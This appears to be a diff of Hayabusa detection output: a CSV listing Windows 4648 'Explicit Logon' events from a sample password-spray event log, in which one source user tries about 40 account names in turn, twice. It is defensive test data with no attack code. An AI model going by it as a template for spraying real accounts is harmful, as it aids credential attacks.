+2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
